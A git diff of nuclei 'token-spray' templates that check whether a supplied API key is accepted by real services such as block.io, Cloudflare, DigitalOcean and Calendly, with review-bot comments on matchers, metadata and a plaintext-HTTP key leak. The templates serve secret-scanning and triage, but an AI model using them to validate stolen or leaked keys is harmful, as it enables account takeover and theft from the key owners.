@@ -0,0 +1,25 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/nuclei-templates/Other/api-block.yaml b/nuclei-templates/Other/api-block.yaml deleted file mode 100644 index 616a67dd9f..0000000000 --- a/nuclei-templates/Other/api-block.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-block - -info: - name: block.io API Test - author: daffainfo - severity: info - description: Bitcoin Payment, Wallet & Transaction Data - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/tree/main/block - tags: token-spray,block - -self-contained: true -requests: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and diff --git a/nuclei-templates/Other/api-blockchain-398.yaml b/nuclei-templates/Other/api-blockchain-398.yaml index 4f027d84d3..afa9207f6c 100644 --- a/nuclei-templates/Other/api-blockchain-398.yaml +++ b/nuclei-templates/Other/api-blockchain-398.yaml @@ -1,13 +1,17 @@ id: api-blockchain info: - name: Blockhain API Test + name: Blockchain API Test author: daffainfo severity: info reference: - https://api.blockchain.com/v3/#/ - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md tags: token-spray,blockchain + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 self-contained: true requests: 
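Review bot: The `classification` block added to api-blockchain-398.yaml is internally inconsistent: `cvss-score: 0.0` with a vector of `C:N/I:N/A:N` states "no impact", yet `cwe-id: CWE-200` labels it an information-exposure weakness. A token-validity check is not a vulnerability in the target service, and none of the other token-spray templates in this diff carry a classification block, so either drop these four lines or choose a vector and score that reflect what a leaked key actually exposes. The `# Enhanced by cs on 2022/02/28` trailer added in the next hunk is also the only hand-written marker in this batch; the other templates carry a `# digest:` line instead.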
@@ -25,3 +29,5 @@ requests: - '"balance"' - '"available"' condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/api-browshot.yaml b/nuclei-templates/Other/api-browshot.yaml index 7d882d928f..45a6d0f8ac 100644 --- a/nuclei-templates/Other/api-browshot.yaml +++ b/nuclei-templates/Other/api-browshot.yaml @@ -8,10 +8,13 @@ info: reference: - https://browshot.com/api/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/browshot + metadata: + max-request: 1 tags: token-spray,browshot self-contained: true -requests: + +http: - method: GET path: - "https://api.browshot.com/api/v1/simple?url=http://mobilito.net/&instance_id=12&width=640&height=480&key={{token}}" @@ -24,3 +27,5 @@ requests: - '"priority"' - '"url"' condition: and + +# digest: 490a00463044022007d1b5a388dc96ef04fb6224f495336a5ca8fdd6ec9d18d7a134f18ec0aacbc102203065a60bb755e2f42f6e493ea813e7c4a1b988e7772b64770a4f45f105b441ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-c99.yaml b/nuclei-templates/Other/api-c99.yaml index 0ca60b0740..2dbd20f0ec 100644 --- a/nuclei-templates/Other/api-c99.yaml +++ b/nuclei-templates/Other/api-c99.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://api.c99.nl - tags: c99,api,dns,token-spray + metadata: + max-request: 1 + tags: c99,api,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.c99.nl/ping?key={{token}}&host=1.1.1.1 @@ -19,3 +22,5 @@ requests: part: body words: - "PING 1.1.1.1" + +# digest: 490a00463044022056cd5552c0ec71d3dad9958b0c6072da4f9238f6cf9754a22caa50ad957dd47002207994331d6222068f5f418ec5fab63453f960f34a2d6a1e10fa4af1f079237f51:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-calendly-404.yaml b/nuclei-templates/Other/api-calendly-404.yaml new file mode 100644 index 0000000000..648bfea8b1 --- /dev/null +++ b/nuclei-templates/Other/api-calendly-404.yaml 
@@ -0,0 +1,17 @@ +id: api-calendly +info: + name: Calendly API Test + author: zzeitlin + reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me + severity: info + tags: token-spray,calendly +requests: + - method: GET + path: + - "https://calendly.com/api/v1/users/me" + headers: + X-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-calendly.yaml b/nuclei-templates/Other/api-calendly.yaml deleted file mode 100644 index 10a8e83478..0000000000 --- a/nuclei-templates/Other/api-calendly.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-calendly - -info: - name: Calendly API Test - author: zzeitlin - reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - severity: info - tags: token-spray,calendly - -self-contained: true -requests: - - method: GET - path: - - "https://calendly.com/api/v1/users/me" - headers: - X-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"data":' - - '"id":' - - '"email":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-chaos.yaml b/nuclei-templates/Other/api-chaos.yaml index 6619833d61..79f76caac1 100644 --- a/nuclei-templates/Other/api-chaos.yaml +++ b/nuclei-templates/Other/api-chaos.yaml @@ -6,16 +6,19 @@ info: severity: info reference: - https://chaos.projectdiscovery.io/#/docs - tags: dns,recon,chaos,token-spray,projectdiscovery + metadata: + max-request: 1 + tags: recon,chaos,token-spray,projectdiscovery self-contained: true -requests: + +http: - method: GET path: - "https://dns.projectdiscovery.io/dns/projectdiscovery.io" + headers: Authorization: "{{token}}" - matchers: - type: word part: body @@ -23,3 +26,5 @@ requests: - '"domain":' - '"subdomains":' condition: and + +# digest: 490a0046304402207bac5b21229f3071f4a0a4328d4b976e44514b4a7114bb26fcbfe41c22fa9f71022025946480d750d697f68c14d15080c9441176b1f85c25c262bdb82f858a5e41eb:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-clearbit-407.yaml b/nuclei-templates/Other/api-clearbit-407.yaml deleted file mode 100644 index cece51d861..0000000000 --- a/nuclei-templates/Other/api-clearbit-407.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-clearbit - -info: - name: Clearbit API Test - author: daffainfo - severity: info - reference: - - https://clearbit.com/docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Clearbit.md - tags: token-spray,clearbit - -self-contained: true -requests: - - raw: - - | - GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 - Authorization: Basic {{base64(token + ':')}} - Host: person.clearbit.com - - matchers: - - type: word - part: body - words: - - '"person":' - - '"id":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-clearbit.yaml b/nuclei-templates/Other/api-clearbit.yaml new file mode 100644 index 0000000000..fc8cf9c9ea --- /dev/null +++ b/nuclei-templates/Other/api-clearbit.yaml @@ -0,0 +1,28 @@ +id: api-clearbit + +info: + name: Clearbit API Test + author: daffainfo + severity: info + description: Search for company logos and embed them in your projects + reference: + - https://clearbit.com/docs + - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit + tags: token-spray,clearbit + +self-contained: true +requests: + - raw: + - | + GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 + Authorization: Basic {{base64(token + ':')}} + Host: person.clearbit.com + + matchers: + - type: word + part: body + words: + - '"person":' + - '"id":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-clickup.yaml b/nuclei-templates/Other/api-clickup.yaml index 56524ada27..7383b5168e 100644 --- a/nuclei-templates/Other/api-clickup.yaml +++ b/nuclei-templates/Other/api-clickup.yaml 
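Review bot: The `description` added to the new api-clearbit.yaml, `Search for company logos and embed them in your projects`, does not describe what the template does: the raw request below it queries `person.clearbit.com/v2/combined/find?email=...`, the person/company enrichment endpoint, and the matchers look for `"person":`. A description along the lines of `Checks whether a Clearbit API key is accepted by the person enrichment endpoint` would match the request. Otherwise the new file is the deleted api-clearbit-407.yaml with only the `description` added and the second reference URL changed, so a rename with a small edit would have given a much smaller diff.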
@@ -8,10 +8,13 @@ info: reference: - https://clickup.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/clickup + metadata: + max-request: 1 tags: token-spray,clickup self-contained: true -requests: + +http: - raw: - | GET https://api.clickup.com/api/v2/user HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"username":' - '"email":' condition: and + +# digest: 4a0a0047304502207b81cd3bfdce3521aebecfee691dfca17cbc3a58c3ac673cbd13469bf07879d4022100c86c4310b8e946cdf4994f423f14677c61efd5030943c66d8e6e89d649fb0f8e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-clockify.yaml b/nuclei-templates/Other/api-clockify.yaml index 3fc3c22ceb..c9b106b538 100644 --- a/nuclei-templates/Other/api-clockify.yaml +++ b/nuclei-templates/Other/api-clockify.yaml @@ -8,10 +8,13 @@ info: reference: - https://clockify.me/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/clockify + metadata: + max-request: 1 tags: token-spray,clockify self-contained: true -requests: + +http: - raw: - | GET https://api.clockify.me/api/v1/user HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"email":' - '"name":' condition: and + +# digest: 4a0a004730450221008e7f991b307ddcb8b49287eb2361e0cb9d4e3c50608458ae422bf1d51647b43602205e29d04c3149340dcfebc19bf35ae9f24950dcd85de1a73bc1e0bfa31cfe6233:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-cloudconvert.yaml b/nuclei-templates/Other/api-cloudconvert.yaml index d9dec21d91..19e55e4007 100644 --- a/nuclei-templates/Other/api-cloudconvert.yaml +++ b/nuclei-templates/Other/api-cloudconvert.yaml @@ -8,10 +8,13 @@ info: reference: - https://cloudconvert.com/api/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/cloudconvert + metadata: + max-request: 1 tags: token-spray,cloudconvert self-contained: true -requests: + +http: - raw: - | GET https://api.cloudconvert.com/v2/tasks HTTP/1.1 
@@ -25,3 +28,5 @@ requests: - '"data":' - '"id":' condition: and + +# digest: 4b0a00483046022100a6956ea28ef86d116576b382d1b29f94b13de90bd565fee36c9a9e5580520775022100fe7294714d97b26786292d9b104c677ddc921694bf79800f2af2ff2156fc7039:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-cloudflare.yaml b/nuclei-templates/Other/api-cloudflare.yaml index 9e65ce5251..d1e16361f1 100644 --- a/nuclei-templates/Other/api-cloudflare.yaml +++ b/nuclei-templates/Other/api-cloudflare.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://dash.cloudflare.com/profile/api-tokens + metadata: + max-request: 1 tags: token-spray,cloudflare self-contained: true -requests: + +http: - raw: - | GET https://api.cloudflare.com/client/v4/user/tokens/verify HTTP/1.1 @@ -22,3 +25,5 @@ requests: part: body words: - 'This API Token is valid and active' + +# digest: 4a0a00473045022100f874f0d5f3b6163d67a19d36c8790348c48c79767c7e87e4e71ca3226bbfa7e80220715e0a4b78d4a119954edcbc81ba94fae5f7c8f0ce3bb675ad774fa8e3b1dd63:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-codestats.yaml b/nuclei-templates/Other/api-codestats.yaml index 187bbb9d79..b0c73d631e 100644 --- a/nuclei-templates/Other/api-codestats.yaml +++ b/nuclei-templates/Other/api-codestats.yaml @@ -8,10 +8,13 @@ info: reference: - https://codestats.net/api-docs - https://github.com/daffainfo/all-about-apikey/tree/main/codestats + metadata: + max-request: 1 tags: token-spray,codestats self-contained: true -requests: + +http: - raw: - | POST https://codestats.net/api/my/pulses HTTP/1.1 @@ -32,3 +35,5 @@ requests: part: body words: - '"Great success!"' + +# digest: 4b0a00483046022100e43297cf4a87a86b76c1e936f41eed084eea8a903cd431158894657559fa8e81022100cfd89d2407870e297e8050fef0177e7ca76e4805ebd55be4afe87f9169daf28c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-coinmarketcap.yaml b/nuclei-templates/Other/api-coinmarketcap.yaml index 3fa6d702c7..a7651387fe 100644 
--- a/nuclei-templates/Other/api-coinmarketcap.yaml +++ b/nuclei-templates/Other/api-coinmarketcap.yaml @@ -4,13 +4,17 @@ info: name: CoinMarketCap API Test author: daffainfo severity: info + description: Cryptocurrencies Prices reference: - https://coinmarketcap.com/api/documentation/v1 - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinMarketCap.md + - https://github.com/daffainfo/all-about-apikey/tree/main/coinmarketcap + metadata: + max-request: 1 tags: token-spray,coinmarketcap self-contained: true -requests: + +http: - raw: - | GET https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest HTTP/1.1 @@ -25,3 +29,5 @@ requests: - '"symbol"' - '"cmc_rank"' condition: and + +# digest: 4b0a00483046022100e853728243b56db54ee87b9277b7ec9994bcbb7fd9415f71ded19a7f8006eba9022100deb18ad5c34d2d1eacfb4b8bdc85e2b8b8049ea24d1ee9863e3a6ab9d24a7e1c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-coinranking.yaml b/nuclei-templates/Other/api-coinranking.yaml index 66bcd4d92f..0c9378c21a 100644 --- a/nuclei-templates/Other/api-coinranking.yaml +++ b/nuclei-templates/Other/api-coinranking.yaml @@ -4,13 +4,17 @@ info: name: Coinranking API Test author: daffainfo severity: info + description: Live Cryptocurrency data reference: - https://developers.coinranking.com/api/documentation - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinranking.md + - https://github.com/daffainfo/all-about-apikey/tree/main/coinranking + metadata: + max-request: 1 tags: token-spray,coinranking self-contained: true -requests: + +http: - raw: - | GET https://api.coinranking.com/v2/exchanges HTTP/1.1 @@ -25,3 +29,5 @@ requests: - '"coinrankingUrl"' - '"uuid"' condition: and + +# digest: 4a0a00473045022100f99a0fa5d0c7f4ca48d284f1b6bba481a77b104ba7ec484ea8bec09d00ffdf230220254dbe17cc7d8cd49419450a5917137ff2d96a27439efa377d200c218b0d5466:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-cooperhewitt-411.yaml b/nuclei-templates/Other/api-cooperhewitt-409.yaml similarity index 100% rename from nuclei-templates/Other/api-cooperhewitt-411.yaml rename to nuclei-templates/Other/api-cooperhewitt-409.yaml diff --git a/nuclei-templates/Other/api-craftmypdf.yaml b/nuclei-templates/Other/api-craftmypdf.yaml index 5093bbe9ff..d74982be22 100644 --- a/nuclei-templates/Other/api-craftmypdf.yaml +++ b/nuclei-templates/Other/api-craftmypdf.yaml @@ -8,10 +8,13 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/craftmypdf + metadata: + max-request: 1 tags: token-spray,craftmypdf self-contained: true -requests: + +http: - raw: - | GET https://api.craftmypdf.com/v1/list-templates?limit=300&offset=0 HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"template_id":' - '"name":' condition: and + +# digest: 490a004630440220540310182df1fafcfa289b4e06a781a5f2285de23503fdc711783f1ea613994a0220403015028df606a19c774b161958bc222da7e77cde74276356593af1219f1f43:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-currencyfreaks.yaml b/nuclei-templates/Other/api-currencyfreaks.yaml index cfaf6d04ae..b505b3d6ed 100644 --- a/nuclei-templates/Other/api-currencyfreaks.yaml +++ b/nuclei-templates/Other/api-currencyfreaks.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencyfreaks.com/documentation.html - https://github.com/daffainfo/all-about-apikey/tree/main/currencyfreaks + metadata: + max-request: 1 tags: token-spray,currencyfreaks self-contained: true -requests: + +http: - method: GET path: - "https://api.currencyfreaks.com/latest?apikey={{token}}" @@ -24,3 +27,5 @@ requests: - '"base"' - '"rates"' condition: and + +# digest: 4a0a00473045022100d4fcb9072555b2150c171057bf9fb26ca331937cb2f794d98e569ecd6c7af5b802203da7720152beebc0bd626a426a6394e957ceea376d5bc4cd3e4a704c73457e64:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-currencylayer.yaml b/nuclei-templates/Other/api-currencylayer.yaml index a844182a19..21ade05226 100644 --- a/nuclei-templates/Other/api-currencylayer.yaml +++ b/nuclei-templates/Other/api-currencylayer.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencylayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencylayer + metadata: + max-request: 1 tags: token-spray,currencylayer self-contained: true -requests: + +http: - method: GET path: - "http://api.currencylayer.com/live?access_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"source"' - '"quotes"' condition: and + +# digest: 4b0a00483046022100820e0350a914990da93957e4244a2652237edfd6d2941ce963a4a00a7ba601f0022100b155461a694a16024e2baf6156787055d3169371a041e455bebeb0800a7be995:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-currencyscoop.yaml b/nuclei-templates/Other/api-currencyscoop.yaml index c0f8bc8258..401b293563 100644 --- a/nuclei-templates/Other/api-currencyscoop.yaml +++ b/nuclei-templates/Other/api-currencyscoop.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencyscoop.com/api-documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencyscoop + metadata: + max-request: 1 tags: token-spray,currencyscoop self-contained: true -requests: + +http: - method: GET path: - "https://api.currencyscoop.com/v1/historical?api_key={{token}}&date=2022-01-01" @@ -24,3 +27,5 @@ requests: - '"base"' - '"rates"' condition: and + +# digest: 4a0a00473045022100a251b998395360e281200f5c4083c3634c6953d4d692c2926164fa3f97bf3b390220594bfd8b5953b879fc8e4e7e9d5b243db8158227e7b745170784e0e9627aa420:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-debounce-414.yaml b/nuclei-templates/Other/api-debounce-414.yaml deleted file mode 100644 index 2c1aef9552..0000000000 --- a/nuclei-templates/Other/api-debounce-414.yaml +++ /dev/null 
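Review bot: The request path in api-currencylayer.yaml, `http://api.currencylayer.com/live?access_key={{token}}`, sends the key being tested over plaintext HTTP in the query string, so every run exposes the candidate token to anything on the network path and to intermediary logs; the hunk migrates the template to `http:` and adds `max-request` but leaves this line as it was. Every other template in this diff uses an `https://` URL — switch to `https://api.currencylayer.com/live?access_key={{token}}` if the service serves that endpoint over TLS (to be confirmed against the documentation linked under `reference`).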
@@ -1,25 +0,0 @@ -id: api-debounce - -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - tags: debounce,token-spray - -self-contained: true -requests: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and diff --git a/nuclei-templates/Other/api-debounce.yaml b/nuclei-templates/Other/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/nuclei-templates/Other/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/nuclei-templates/Other/api-deviantart.yaml b/nuclei-templates/Other/api-deviantart.yaml new file mode 100644 index 0000000000..b09e9acd2b --- /dev/null +++ b/nuclei-templates/Other/api-deviantart.yaml @@ -0,0 +1,21 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + severity: info + reference: https://www.deviantart.com/developers/authentication + tags: token-spray,deviantart + +self-contained: true +requests: + - method: POST + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + body: "access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"status" : "success"' diff --git a/nuclei-templates/Other/api-digitalocean.yaml b/nuclei-templates/Other/api-digitalocean.yaml index d2909d4863..5b6743c467 100644 
--- a/nuclei-templates/Other/api-digitalocean.yaml +++ b/nuclei-templates/Other/api-digitalocean.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://docs.digitalocean.com/reference/api/ + metadata: + max-request: 1 tags: token-spray,digitalocean self-contained: true -requests: + +http: - raw: - | GET https://api.digitalocean.com/v2/droplets HTTP/1.1 @@ -23,3 +26,5 @@ requests: - '"droplets":' - '"meta":' condition: and + +# digest: 4a0a004730450220048c9f87a81205b7fbead8ed3955e8806ccd16bcc988ae8ce7e5e17774cbc1a3022100e79769686477ac1a59c495ad3dc4f57ca5a1dbbd69cc2a83d786348b8d95c2f9:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-dribbble-416.yaml b/nuclei-templates/Other/api-dribbble-416.yaml new file mode 100644 index 0000000000..b2f1d0bc9e --- /dev/null +++ b/nuclei-templates/Other/api-dribbble-416.yaml @@ -0,0 +1,21 @@ +id: api-dribbble + +info: + name: Dribbble API Test + author: daffainfo + severity: info + reference: + - https://developer.dribbble.com/v2/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Dribbble.md + tags: token-spray,dribbble + +self-contained: true +requests: + - method: GET + path: + - "https://api.dribbble.com/v2/user?access_token={{token}}" + + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-dribbble-417.yaml b/nuclei-templates/Other/api-dribbble-417.yaml deleted file mode 100644 index ec36263d18..0000000000 --- a/nuclei-templates/Other/api-dribbble-417.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-dribbble - -info: - name: Dribbble API Test - author: daffainfo - severity: info - reference: - - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md - tags: token-spray,dribbble - -self-contained: true -requests: - - method: GET - path: - - "https://api.dribbble.com/v2/user?access_token={{token}}" - - matchers: - - type: status - status: - - 200 
diff --git a/nuclei-templates/Other/dropbox.yaml b/nuclei-templates/Other/api-dropbox-418.yaml similarity index 100% rename from nuclei-templates/Other/dropbox.yaml rename to nuclei-templates/Other/api-dropbox-418.yaml diff --git a/nuclei-templates/Other/api-europeana-419.yaml b/nuclei-templates/Other/api-europeana-419.yaml new file mode 100644 index 0000000000..bbc103ac30 --- /dev/null +++ b/nuclei-templates/Other/api-europeana-419.yaml @@ -0,0 +1,25 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-europeana.yaml b/nuclei-templates/Other/api-europeana.yaml deleted file mode 100644 index 520c83775d..0000000000 --- a/nuclei-templates/Other/api-europeana.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-europeana - -info: - name: Europeana API Test - author: daffainfo - severity: info - reference: - - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md - tags: token-spray,europeana - -self-contained: true -requests: - - method: GET - path: - - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-exchangerateapi.yaml b/nuclei-templates/Other/api-exchangerateapi.yaml index 79f4626b1b..f4653a98c0 100644 --- a/nuclei-templates/Other/api-exchangerateapi.yaml +++ b/nuclei-templates/Other/api-exchangerateapi.yaml 
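Review bot: The new api-europeana-419.yaml matches on the bare words `success`, `apikey` and `action`, but `success` is present whether the key is accepted or rejected (`"success":true` and `"success":false` both contain it), so the `condition: and` over these three words does not separate a valid key from an invalid one — arguably weaker than the `status: 200` check in the deleted api-europeana.yaml. Match the value rather than the key, e.g. `- '"success":true'` (exact spacing of the JSON to be confirmed against a live response), or pair the word match with a status matcher. The file is also written without a trailing newline (`\ No newline at end of file`), unlike the other new templates in this commit.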
@@ -8,10 +8,13 @@ info: reference: - https://www.exchangerate-api.com/docs/overview - https://github.com/daffainfo/all-about-apikey/tree/main/exchangerate-api + metadata: + max-request: 1 tags: token-spray,exchangerateapi self-contained: true -requests: + +http: - method: GET path: - "https://v6.exchangerate-api.com/v6/{{token}}/latest/USD" @@ -24,3 +27,5 @@ requests: - '"base_code"' - '"conversion_rates"' condition: and + +# digest: 4b0a004830460221008e939efff91306a072bc0233e435e4ef3c76e1202963420a1b1dadc4c8befa360221009615dde4d2402a46fcfc09e44697c6445caf7e52241c96e565b9497f2701eb56:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-facebook-422.yaml b/nuclei-templates/Other/api-facebook.yaml similarity index 100% rename from nuclei-templates/Other/api-facebook-422.yaml rename to nuclei-templates/Other/api-facebook.yaml diff --git a/nuclei-templates/Other/api-fastly.yaml b/nuclei-templates/Other/api-fastly.yaml index e6555d706f..9688149ef5 100644 --- a/nuclei-templates/Other/api-fastly.yaml +++ b/nuclei-templates/Other/api-fastly.yaml @@ -3,19 +3,23 @@ id: api-fastly info: name: Fastly API Test author: Adam Crosser - reference: https://developer.fastly.com/reference/api/ severity: info + reference: + - https://developer.fastly.com/reference/api/ tags: token-spray,fastly self-contained: true requests: - method: GET path: - - "https://api.fastly.com/service" + - "https://api.fastly.com/current_user" headers: Fastly-Key: "{{token}}" matchers: - - type: status - status: - - 200 \ No newline at end of file + - type: word + part: body + words: + - '"created_at":' + - '"customer_id":' + condition: and diff --git a/nuclei-templates/Other/api-festivo-425.yaml b/nuclei-templates/Other/api-festivo-425.yaml deleted file mode 100644 index 30f758bdf2..0000000000 --- a/nuclei-templates/Other/api-festivo-425.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-festivo.yaml b/nuclei-templates/Other/api-festivo.yaml new file mode 100644 index 0000000000..3911ce2636 --- /dev/null +++ b/nuclei-templates/Other/api-festivo.yaml @@ -0,0 +1,26 @@ +id: api-festivo + +info: + name: Festivo API Test + author: daffainfo + severity: info + description: Fastest and most advanced public holiday and observance service on the market + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + tags: token-spray,festivo + +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-flickr.yaml b/nuclei-templates/Other/api-flickr.yaml index 20beaa54a4..f9342c98eb 100644 --- a/nuclei-templates/Other/api-flickr.yaml +++ b/nuclei-templates/Other/api-flickr.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://www.flickr.com/services/developer/api/ + metadata: + max-request: 1 tags: token-spray,flickr self-contained: true -requests: + +http: - method: GET path: - "https://www.flickr.com/services/rest/?method=flickr.tags.getHotList&api_key={{token}}" 
@@ -22,3 +25,5 @@ requests: - 'owner' - 'username' condition: and + +# digest: 490a0046304402202d715a913703652b0eaa9bb0a7012440ff4343fefb182ecc351249af98cf9889022058751ef3d6d67063e1230302ee7fd5320037ad0e69a629db5699b790a5b169fd:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-flowdash.yaml b/nuclei-templates/Other/api-flowdash.yaml index 3f51eb88b4..1c670e9572 100644 --- a/nuclei-templates/Other/api-flowdash.yaml +++ b/nuclei-templates/Other/api-flowdash.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.flowdash.com/docs/api-introduction - https://github.com/daffainfo/all-about-apikey/tree/main/flowdash + metadata: + max-request: 1 tags: token-spray,flowdash self-contained: true -requests: + +http: - raw: - | GET https://app.flowdash.com/api/v1/workflows HTTP/1.1 @@ -25,3 +28,5 @@ requests: - '"id":' - '"name":' condition: and + +# digest: 490a00463044022005d7ad5a370f6263e28dbb59932b488a50a7aec781eb0b5a2cafd0af7c168400022061787d5f88ff385f364518a1d8332575951fe7884bbd79db2371c6b473697890:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-fontawesome.yaml b/nuclei-templates/Other/api-fontawesome-426.yaml similarity index 100% rename from nuclei-templates/Other/api-fontawesome.yaml rename to nuclei-templates/Other/api-fontawesome-426.yaml diff --git a/nuclei-templates/Other/api-fortitoken-cloud-427.yaml b/nuclei-templates/Other/api-fortitoken-cloud.yaml similarity index 100% rename from nuclei-templates/Other/api-fortitoken-cloud-427.yaml rename to nuclei-templates/Other/api-fortitoken-cloud.yaml diff --git a/nuclei-templates/Other/api-front.yaml b/nuclei-templates/Other/api-front.yaml index 4e8f759419..62775936d2 100644 --- a/nuclei-templates/Other/api-front.yaml +++ b/nuclei-templates/Other/api-front.yaml 
